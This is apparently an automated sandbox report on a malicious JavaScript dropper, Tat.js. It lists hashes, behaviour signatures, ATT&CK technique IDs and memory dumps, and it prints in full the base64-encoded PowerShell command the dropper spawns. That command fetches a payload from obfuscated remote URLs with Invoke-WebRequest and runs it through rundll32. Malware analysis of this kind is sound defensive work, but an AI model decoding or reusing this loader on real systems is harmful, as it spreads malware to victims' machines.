f87467551e01a7056e15d488cdca3c60d9a3210eab46d31c5ebba9f01136d9bf

General

Target

Tat.js
Size

581KB
MD5

c55c0aa73b27339d7cef6aeff7961783
SHA1

14000522c0fa494fbe30afa067a55ad42e73c3fe
SHA256

f87467551e01a7056e15d488cdca3c60d9a3210eab46d31c5ebba9f01136d9bf
SHA512

e9bdb60d3a5ec754b92ec2dc66b11cf78809b163c21d7a95f06707f427ef47f6d02996ff5cbe8b46d359abd8e963758933f85888d14ceae018f5a67704600634
SSDEEP

12288:xWGJKxqUwYJpnwhdIhiZAwIQ4Cj8kA4dywL0u+p+fm3DB29vRQIXQrQHRtzggojw:xuZ9KCkHR5ggoo5vuDf2Ag//nt0n4GrS

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
15	4504	powershell.exe
18	4504	powershell.exe
20	4504	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4504	powershell.exe
4504	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4504	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4320 wrote to memory of 4504	4320	wscript.exe	81
PID 4320 wrote to memory of 4504	4320	wscript.exe	81

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Tat.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABlAHgAdAByAGEAYwByAGEAbgBpAGEAbABVAG4AZABlAHAAbwByAHQAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBIAEEARwB3AEEAYQBRAEIAMABBAEcANABBAGEAUQBCAHkAQQBFAE0AQQBiAHcAQgB0AEEASABBAEEAZABRAEIAMABBAEcARQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQQB1AEEASABNAEEAYQB3AEIAcABBAEEAPQA9ACIAOwAkAFIAZQBwAHIAbwB2AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBPAEEARwA4AEEAYgBnAEIAbABBAEcANABBAFoAZwBCAHYAQQBIAEkAQQBZAHcAQgBsAEEARwBFAEEAWQBnAEIAcwBBAEcAVQBBAEwAZwBCAG4AQQBHAGsAQQBaAGcAQgAwAEEASABNAEEATAB3AEIAQwBBAEUAYwBBAEwAdwBCAG8AQQBIAEEAQQBRAGcAQQA9AHoAWABoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHoAQQBDADQAQQBNAFEAQQAzAEEARABBAEEATABnAEEAeQBBAEQAQQBBAE0AZwBBAHUAQQBEAFUAQQBNAGcAQQB2AEEARwBvAEEAVABnAEEAdgBBAEQAUQBBAFUAQQBBAD0AegBYAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBrAEEAYgBnAEIAagBBAEgAVQBBAGMAZwBCADIAQQBHAFUAQQBTAFEAQgB1AEEASABRAEEAYwBnAEIAaABBAEcATQBBAGIAdwBCAGwAQQBHAHcAQQBiAHcAQgB0AEEARwBrAEEAWQB3AEEAdQBBAEcATQBBAGIAQQBCAHYAQQBIAFEAQQBhAEEAQgBwAEEARwA0AEEAWgB3AEEAdgBBAEYAbwBBAEwAdwBCAHEAQQBFADgAQQBhAGcAQQA9AHoAWABoAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBPAFEAQQB2AEEARQBvAEEATgBnAEIAeABBAEUAOABBAFQAZwBCAFQAQQBIAFkAQQBMAHcAQgA1AEEASABjAEEAVQBnAEIARgBBAEUANABBAFUAZwBCAFgAQQBFAEUAQQBOAHcAQQA9AHoAWABoAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEkAQQBNAHcAQQAxAEEAQwA0AEEATQBRAEEAMABBAEQAYwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEARwBVAEEAWQBRAEIAWgBBAEMAOABBAGIAQQBBADEAQQBHAFUAQQBSAGcAQgBIAEEARgBJAEEATQBnAEIAcgBBAEcATQBBAFMAQQBCAGkAQQBBAD0APQB6AFgAaABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AUQBBADAAQQBEAGMAQQBMAGcAQQB4AEEARABnAEEATQBnAEEAdgBBAEQAUQBBAGEAdwBCAHgAQQBHAHcAQQBUAHcAQgBGAEEAQwA4AEEAUgBnAEIAeABBAEUAYwBBAFQAdwBCAHYAQQBBAD0APQAiADsAJABpAG4AdABlAGwAbABlAGMAdAB1AGEAbABpAHMAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAxAEEARwA0AEEAYwBRAEIAMQBBAEcAawBBAFkAdwBCAHIAQQBIAE0AQQBhAFEAQgBzAEEASABZAEEAWgBRAEIAeQBBAEcAVQBBAFoAQQBBAHUAQQBHAHMAQQBiAHcAQgBsAEEARwB3AEEAYgBnAEEAPQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAYwBBAGUAUQBCAHQAQQBHADQAQQBiAHcAQgAwAEEARwBnAEEAYgB3AEIAeQBBAEcARQBBAGUAQQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEASABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAHcAQQB1AEEARABVAEEATgBRAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBOAFEAQQB3AEEAQQA9AD0AIgA7ACQAaQBuAGUAbAB1AGQAaQBiAGwAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAawBBAFoAdwBCAGwAQQBHADgAQQBiAGcAQgBvAEEARwBVAEEAWQBRAEIAeQBBAEgAUQBBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAagBBAEcAZwBBAGQAUQBCAHkAQQBHAE0AQQBhAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AYQBnAGkAYwBzAEoAaQBjAGEAcgBpAGwAbABhACAAaQBuACAAJABSAGUAcAByAG8AdgBpAG4AZwAgAC0AcwBwAGwAaQB0ACAAIgB6AFgAaAAiACkAIAB7ACQAUwBlAGwAZQBuAG8AZABvAG4AdABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBnAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAE0AQQBMAGcAQQB5AEEARABBAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBADUAQQBBAD0APQBYAGoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAbABBAEcAOABBAGMAQQBCAG8AQQBIAGsAQQBiAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEEAPQA9AFgAagBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBOAFEAQQB1AEEARABRAEEATQBnAEEAdQBBAEQAawBBAE0AUQBBAHUAQQBEAFUAQQBNAFEAQQA9ACIAOwAkAHQAYQByAGcAZQB0AGkAbgBnAEsAYQB0AGkAcAB1AG4AZQByAG8AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAZwBBAE8AQQBBAHUAQQBEAEUAQQBNAGcAQQB5AEEAQwA0AEEATgBRAEEAMwBBAEMANABBAE0AZwBBAHkAQQBEAGcAQQBGAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARwBBAEcAawBBAFkAZwBCAHkAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAZABBAEIAaABBAEgAZwBBAEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgBBAEIAdgBBAEgAYwBBAFoAUQBCAHkAQQBHAHcAQQBaAFEAQgB6AEEASABNAEEAYgBnAEIAbABBAEgATQBBAGMAdwBCAFEAQQBHAGsAQQBiAGcAQgBoAEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAGMAdwBBAHUAQQBHAEkAQQBiAEEAQgBoAEEARwBNAEEAYQB3AEEAPQAiADsAdAByAHkAIAB7ACQAcwBlAGUAcgBsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAWQBRAEIAcwBBAEcAdwBBAGEAUQBCAGoAQQBHAFUAQQBZAGcAQgAxAEEASABNAEEAVgBRAEIAdQBBAEcAZwBBAGIAdwBCAHkAQQBHAGsAQQBlAGcAQgB2AEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGIAQQBCADUAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBBAEEAPQAiADsAJABQAHIAbwB4AGUAbgB5ACAAPQAgACQATQBhAGcAaQBjAHMASgBpAGMAYQByAGkAbABsAGEAOwAkAGEAbABsAGUAdgBpAGEAdABlACAAPQAgACIAYgBRAEIAMQBBAEcAdwBBAGQAQQBCAHAAQQBIAEEAQQBiAEEAQgBsAEEASABBAEEAYgB3AEIAcABBAEcANABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBDAEEARwBVAEEAWgBRAEIAcgBBAEcAVQBBAFoAUQBCAHcAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBACIAOwAkAEMAbwBsAGwAdQBkAGUAcgBzAEQAdQBuAGcAeQBhAHIAZAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAbwB4AGUAbgB5ACkAKQA7ACQATQBlAHQAZQBwAGUAbgBjAGUAcABoAGEAbABpAGMARABvAHQAaQBuAGcAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAGUAdgBpAGEAdABlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAQwBvAGwAbAB1AGQAZQByAHMARAB1AG4AZwB5AGEAcgBkACAALQBPACAAQwA6AFwAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABcACQATQBlAHQAZQBwAGUAbgBjAGUAcABoAGEAbABpAGMARABvAHQAaQBuAGcAbAB5ADsAJABzAGUAZQByAGwAaQBrAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBZAFEAQgBzAEEARwB3AEEAYQBRAEIAagBBAEcAVQBBAFkAZwBCADEAQQBIAE0AQQBWAFEAQgB1AEEARwBnAEEAYgB3AEIAeQBBAEcAawBBAGUAZwBCAHYAQQBHADQAQQBkAEEAQgBoAEEARwB3AEEAYgBBAEIANQBBAEMANABBAFkAdwBCAGgAQQBIAE0AQQBhAEEAQQA9ACIAOwAkAE4AbwBuAGIAcgBvAG8AZAB5AEIAbwBuAG4AZQB0AGgAZQBhAGQAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAJABNAGUAdABlAHAAZQBuAGMAZQBwAGgAYQBsAGkAYwBEAG8AdABpAG4AZwBsAHkAKQAuAEwAZQBuAGcAdABoADsAJABkAGkAdABjAGgAZQByAE0AYQBjAHIAbwBwAGgAbwB0AG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGsAQQBOAFEAQQB1AEEARABRAEEATgBBAEEAdQBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBNAGcAQQB3AEEARABBAEEASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE0AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABrAEEAIgA7ACQAQgBvAHIAbwB1AGcAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwB3AEEAWgBRAEIAbgBBAEcAawBBAGQAQQBCAHAAQQBHADAAQQBhAFEAQgAwAEEASABrAEEAUgBBAEIANQBBAEcAVQBBAFkAZwBCAGwAQQBHAE0AQQBhAHcAQQB1AEEARwBRAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBBAD0APQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AUQBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AZwBBAHcAQQBEAFkAQQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEcAVQBBAGIAZwBCAHoAQQBIAFEAQQBhAFEAQgBqAEEARwBzAEEAUQBRAEIAdQBBAEcARQBBAGMAQQBCAG8AQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMANABBAGIAUQBCADQAQQBBAD0APQAiADsAaQBmACAAKAAkAE4AbwBuAGIAcgBvAG8AZAB5AEIAbwBuAG4AZQB0AGgAZQBhAGQAIAAtAGcAZQAgADgAMQA1ADAAMwApAHsAJABTAGEAYwByAG8AYwBvAGMAYwB5AGcAZQBhAGwATwBuAG8AbQBhAHQAbwBwAG8AZQB0AGkAYwBhAGwAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBTAEEARwBVAEEAWgBnAEIAMQBBAEcAYwBBAGEAUQBCAGgAQQBFADAAQQBZAFEAQgBqAEEASABJAEEAYgB3AEIAagBBAEgAawBBAGQAQQBCAG8AQQBHAFUAQQBiAFEAQgBwAEEARwBFAEEATABnAEIAagBBAEcAOABBAGIAQQBCAHMAQQBHAFUAQQBaAHcAQgBsAEEAQQA9AD0AWAB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAVQBBAGIAZwBCAGoAQQBHADgAQQBkAFEAQgB5AEEASABRAEEAYQBRAEIAbABBAEgASQBBAGIAQQBCAHAAQQBHAHMAQQBaAFEAQgBFAEEARwBVAEEAWQB3AEIAaABBAEcAUQBBAGEAUQBBAHUAQQBHAHcAQQBkAEEAQgBrAEEARwBFAEEAWAB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAHcAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYQBRAEIAagBBAEcARQBBAGIAQQBCAHMAQQBIAGsAQQBVAEEAQgB5AEEARwBVAEEAYwBnAEIAbABBAEcAdwBBAFoAUQBCAGgAQQBIAE0AQQBaAFEAQQB1AEEARwBVAEEAYwB3AEIAMABBAEcARQBBAGQAQQBCAGwAQQBBAD0APQBYAHQAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATgB3AEEAdQBBAEQARQBBAE0AZwBBADQAQQBDADQAQQBOAEEAQQAzAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBACIAOwBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAEoAQQBCAFUAQQBIAEkAQQBZAFEAQgBqAEEARwBnAEEAWgBRAEIAdgBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBlAGcAQgBsAEEARwBRAEEASQBBAEEAOQBBAEMAQQBBAEkAZwBCAFEAQQBHAFUAQQBjAGcAQgBwAEEASABNAEEAWQBRAEIAMABBAEgAVQBBAGMAZwBCAHUAQQBHAGsAQQBkAFEAQgB0AEEAQwBJAEEATwB3AEEAawBBAEcATQBBAGEAUQBCAHQAQQBHAEUAQQBjAGcAQgB2AEEARwA4AEEAYgBnAEEAZwBBAEQAMABBAEkAQQBBAGkAQQBHAEkAQQBZAFEAQgBzAEEARwBFAEEAWgBBAEIAcABBAEcANABBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgAwAEEASABRAEEAWgBRAEIAcwBBAEgATQBBAEkAZwBBADcAQQBHAE0AQQBiAFEAQgBrAEEAQwBBAEEATAB3AEIAagBBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYgBRAEIAMQBBAEcAdwBBAGQAQQBCAHAAQQBIAEEAQQBiAEEAQgBsAEEASABBAEEAYgB3AEIAcABBAEcANABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBDAEEARwBVAEEAWgBRAEIAcgBBAEcAVQBBAFoAUQBCAHcAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBAEwAQQBCAHQAQQBIAFUAQQBjAHcAQgAwAEEARABzAEEASgBBAEIARABBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBaAGcAQgBwAEEARwBNAEEAWQBRAEIAdQBBAEgAUQBBAEkAQQBBADkAQQBDAEEAQQBJAGcAQgBVAEEARwBnAEEAZQBRAEIAegBBAEcARQBBAGIAZwBCAHYAQQBIAFUAQQBjAGcAQgBoAEEARwA0AEEAUQBRAEIAdQBBAEcARQBBAGIAQQBCAGwAQQBIAEEAQQBjAHcAQgA1AEEAQwBJAEEATwB3AEEAawBBAEUAcwBBAFoAUQBCAHIAQQBHAE0AQQBhAEEAQgBwAEEAQwBBAEEAUABRAEEAZwBBAEMASQBBAFUAdwBCAHcAQQBHAGsAQQBaAHcAQgBsAEEARwB3AEEAYQBRAEIAaABBAEcATQBBAFoAUQBCAGgAQQBHAFUAQQBJAGcAQQA3AEEAQwBRAEEAYgBnAEIAdgBBAEcANABBAFkAdwBCAHYAQQBHADAAQQBjAEEAQgB5AEEARwBVAEEAYQBBAEIAbABBAEcANABBAGMAdwBCAHAAQQBHAEkAQQBiAEEAQgBsAEEARwB3AEEAZQBRAEEAZwBBAEQAMABBAEkAQQBBAGkAQQBIAFEAQQBZAFEAQgBwAEEASABNAEEAYQBBAEIAdgBBAEYATQBBAGQAUQBCAGoAQQBHAE0AQQBkAFEAQgBzAEEARwBFAEEASQBnAEEANwBBAEEAPQA9ACIAOwAkAGQAaQBhAG4AdABoAGUAcgBhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEAegBBAEMANABBAE0AZwBBAHkAQQBEAEEAQQBMAGcAQQB5AEEARABBAEEATQBRAEEAdQBBAEQASQBBAE0AQQBBAHcAQQBBAD0APQBtAGoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB6AEEASABVAEEAWQBnAEIAagBBAEcARQBBAGMAZwBCAGkAQQBHADgAQQBiAGcAQgBwAEEARwBZAEEAWgBRAEIAeQBBAEcAOABBAGQAUQBCAHoAQQBFADAAQQBkAFEAQgBzAEEARwB3AEEAYQBRAEIAbgBBAEcARQBBAGIAZwBBAHUAQQBHAE0AQQBZAHcAQQA9ACIAOwAkAHEAdQBlAHMAdABpAG8AbgBvAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMABBAEcAOABBAGMAZwBCAHUAQQBHAEUAQQBaAEEAQgB2AEEARwB3AEEAYQBRAEIAcgBBAEcAVQBBAFEAUQBCAHkAQQBHAEUAQQBZAGcAQgBsAEEASABNAEEAYwBRAEIAMQBBAEcAVQBBAGMAdwBBAHUAQQBIAE0AQQBaAFEAQQA9AFUARQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBHAE0AQQBjAGcAQgBwAEEASABBAEEAZABBAEIAdgBBAEgASQBBAGEAUQBCAGgAQQBGAFEAQQBhAFEAQgAwAEEARwBrAEEAWQBRAEIAdQBBAEcAawBBAFkAdwBBAHUAQQBHAEkAQQBlAGcAQQA9AFUARQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATwBBAEEAdQBBAEQARQBBAE8AUQBBADUAQQBDADQAQQBNAFEAQQAxAEEARABVAEEAIgA7ACQAVQBuAGQAcgBlAGEAbQBsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBFAEEAWQBnAEIAdgBBAEcATQBBAGIAQQBCAHYAQQBGAGMAQQBaAFEAQgBoAEEARwB3AEEAZABBAEIAbwBBAEcAMABBAGIAdwBCAHUAQQBHAGMAQQBaAFEAQgB5AEEAQwA0AEEAYQBRAEIAdQBBAEgATQBBAGQAUQBCAHkAQQBHAFUAQQBoAFAAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAEUAQQBkAEEAQgBwAEEARwBZAEEAYQBRAEIAbABBAEgATQBBAEwAZwBCAGgAQQBIAEkAQQBZAHcAQgBvAEEARwBrAEEAaABQAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBOAGcAQQAxAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAGgAUABkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AZwBBAHUAQQBEAEUAQQBOAEEAQQAwAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AIABlAGwAcwBlACAAewAkAEkAcgBnAHUAbgBpAHMAdABFAG4AdAByAHkAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQAwAEEAQwA0AEEATQBnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBNAFEAQQB1AEEARABFAEEATgBnAEEANABBAEEAPQA9ACIAOwAkAFQAZQBuAGEAbgB0AGUAcgBNAGUAZwBhAHAAbwBkAGkAdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEAeQBBAEMANABBAE0AZwBBAHcAQQBEAFUAQQBMAGcAQQAwAEEARABrAEEATABnAEEAMgBBAEQAWQBBAEgAcAByAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADIAQQBDADQAQQBOAEEAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAEwAZwBBAHgAQQBEAGcAQQBOAFEAQQA9AEgAcAByAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAWQBBAE0AZwBBAHUAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AUQBBADAAQQBEAEEAQQBIAHAAcgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFUAQQBiAFEAQgBpAEEARwA4AEEAYgBBAEIAdgBBAEcAdwBBAFkAUQBCAHMAQQBHAGsAQQBZAFEAQgBWAEEARwA0AEEAYwB3AEIAdwBBAEcAOABBAGMAZwBCADAAQQBHAGsAQQBkAGcAQgBsAEEARwB3AEEAZQBRAEEAdQBBAEgATQBBAFoAUQBBAD0AIgA7AEYAWQBSADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4504

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_anr0zhzf.ney.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4504-134-0x0000022E2CD50000-0x0000022E2CDD2000-memory.dmp

Filesize
520KB

Download
memory/4504-144-0x0000022E2CD20000-0x0000022E2CD30000-memory.dmp

Filesize
64KB

Download
memory/4504-145-0x0000022E2CEE0000-0x0000022E2CF02000-memory.dmp

Filesize
136KB

Download
memory/4504-146-0x0000022E2D020000-0x0000022E2D122000-memory.dmp

Filesize
1.0MB

Download
memory/4504-147-0x0000022E2AC40000-0x0000022E2AC50000-memory.dmp

Filesize
64KB

Download
memory/4504-148-0x0000022E2AC40000-0x0000022E2AC50000-memory.dmp

Filesize
64KB

Download
memory/4504-149-0x0000022E2AC40000-0x0000022E2AC50000-memory.dmp

Filesize
64KB

Download
memory/4504-150-0x0000022E2CF50000-0x0000022E2CF90000-memory.dmp

Filesize
256KB

Download
memory/4504-151-0x0000022E2CF30000-0x0000022E2CF44000-memory.dmp

Filesize
80KB

Download

Analysis

Sharing